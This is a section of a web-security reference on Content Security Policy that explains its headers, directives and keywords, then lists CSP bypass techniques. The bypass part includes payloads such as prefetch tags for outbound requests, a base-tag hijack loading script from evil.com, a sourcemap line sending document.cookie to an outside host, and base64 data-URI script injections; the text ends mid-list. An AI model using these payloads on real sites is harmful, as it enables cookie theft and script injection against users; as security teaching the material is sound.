4.2.4. CSP¶
4.2.4.1. What is CSP?¶
Content Security Policy, referred to as CSP, translated as Content Security Policy. As the name suggests, this specification is related to content security, mainly used to define which resources can be loaded by the current page and reduce the occurrence of XSS.
4.2.4.2. Configuration¶
CSP policies can be defined through HTTP headers or meta elements.
There are three categories of CSP:
Content-Security-Policy (Google Chrome)
X-Content-Security-Policy (Firefox)
X-WebKit-CSP (WebKit-based browsers, e.g. Safari)
HTTP header :
"Content-Security-Policy:" policy
"Content-Security-Policy-Report-Only:" policy
HTTP Content-Security-Policy header can specify that one or more resources are secure, while Content-Security-Policy-Report-Only allows the server to check (not enforce) a policy. Policy definitions for multiple headers take precedence with the one defined first.
HTML Meta :
<meta http-equiv="content-security-policy" content="policy">
<meta http-equiv="content-security-policy-report-only" content="policy">
4.2.4.2.1. Instruction Description¶
instruction |
illustrate |
---|---|
default-src |
Define the default resource loading strategy |
connect-src |
Define loading strategies such as Ajax, WebSocket, etc. |
font-src |
Define Font loading strategy |
frame-src |
Define Frame Loading Strategy |
img-src |
Define image loading strategy |
media-src |
Define <audio>, <video> and other reference resource loading strategies |
object-src |
Define <applet>, <embed>, <object> and other reference resource loading strategies |
script-src |
Define JS loading strategy |
style-src |
Define CSS loading strategy |
base-uri |
Defines the <base> root URL policy, not using default-src as default |
sandbox |
A value of allow-forms enables sandbox for the resource |
report-uri |
The value is /report-uri, the commit log |
4.2.4.2.2. Keywords¶
-
Allow loading from arbitrary urls, excep
data:
blob:
filesystem:
schemes
e.g.
img-src -
none
Disallow loading resources from any url
e.g.
object-src 'none'
self
Only same-origin resources can be loaded
e.g.
img-src 'self'
data:
Resources can be loaded through the data protocol
e.g.
img-src 'self' data:
domain.example.com
e.g.
img-src domain.example.com
Resources can only be loaded from specific domains
\*.example.com
e.g.
img-src \*.example.com
Resources can be loaded from any subdomain of example.com
https://cdn.com
e.g.
img-src https://cdn.com
Resources can only be loaded with https from a given domain
https:
e.g.
img-src https:
Resources can only be loaded with https from any domain
unsafe-inline
Allow internal resources to execute code such as style attributes, onclick or sicript tags
e.g.
script-src 'unsafe-inline'
unsafe-eval
Allows some unsafe code execution methods, such as js’s eval()
e.g.
script-src 'unsafe-eval'
nonce-<base64-value>'
Use a random nonce, allowing to load tags that match the nonce attribute on the tag
e.g.
script-src 'nonce-bm9uY2U='
<hash-algo>-<base64-value>'
Allow code blocks with matching hash values to be executed
e.g.
script-src 'sha256-<base64-value>'
4.2.4.2.3. Configuration example¶
Allow execution of inline JS code, but not loading external resources
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';
4.2.4.3. Bypass¶
4.2.4.3.1. Preloading¶
In order to enhance the user experience and make the browser more efficient, the browser has a preloading function, which generally uses the idle time of the browser to load the specified content and then cache it. This technology is subdivided into DNS-prefetch, subresource, prefetch, preconnect, prerender.
HTML5 page preload is specified with the rel attribute of the link tag. If the csp header has unsafe-inline, you can make a request to the outside world by preloading, for example:
<!-- preloading page -->
<link rel='prefetch' href='http://xxxx'><!-- firefox -->
<link rel='prerender' href='http://xxxx'><!-- chrome -->
<!-- preloading image -->
<link rel='prefetch' href='http://xxxx/x.jpg'>
<!-- DNS prefetch -->
<link rel="dns-prefetch" href="http://xxxx">
<!-- preloading specific file types -->
<link rel='preload' href='//xxxxx/xx.js'><!-- chrome -->
In addition, not all pages can be preloaded, and the preload operation will be blocked when the resource type is as follows:
URL contains download resources
The page contains audio and video
ajax requests for POST, PUT and DELET operations
HTTP Authentication
HTTPS pages
Malware pages
popup page
Pages that take up a lot of resources
Open chrome developer tools
4.2.4.3.2. MIME Sniff¶
For example, csp prohibits cross-site reading of scripts, but cross-site reading of img is possible, then pass an img containing a script, and then <script href='http://xxx.com/xx.jpg'>
, here csp thinks it is an img, bypassing the check, if the website does not return the correct mime type, the browser will guess, it may load the img as a script
4.2.4.3.3. 302 Jump¶
For 302 jump bypass CSP, there are actually the following limitations:
The springboard must be within an allowed domain.
The host part of the file to be loaded must match the host part of the allowed domain
4.2.4.3.4. iframe¶
When the code can be executed, you can create a frame whose source is a static like css
js
etc. When the configuration is incorrect, the frame does not have csp, and then the frame is created again under the frame to achieve the purpose of bypass. In the same way, use ../../../
/%2e%2e%2f
in the links that may trigger the server to report an error can also achieve the corresponding purpose.
4.2.4.3.5. base-uri¶
When script-src is nonce or unlimited, and base-uri is unlimited, the root URL can be modified by base
tag to bypass, and http://evil.com/main.js is loaded as follows:
<base href="http://evil.com/">
<script nonce="correct value" src="/main.js"></script>
4.2.4.3.6. Others¶
location bypass
Bypass same-origin sites with malicious SVGs when SVGs can be uploaded
When there is a CRLF vulnerability and the controllable point is above the CSP, it can be injected into the HTTP response to affect the CSP parsing
CND Bypass,if the website trusts a CDN, it can use the static resource bypass of the corresponding CDN
Angular versions <1.5.9 >=1.5.0, there is a vulnerability Git Pull Request
- jQuery sourcemap
document.write(`<script> //@ sourceMappingURL=http://xxxx/`+document.cookie+`<\/script>`);``
ping attribute of a tag
For FireFox
<META HTTP-EQUIV="refresh" CONTENT="0; url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnSWhhdmVZb3VOb3cnKTs8L3NjcmlwdD4=">
<link rel="import" />
<meta http-equiv="refresh" content="0; url=http://...." />
- When restricting only
script-src
: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
- When restricting only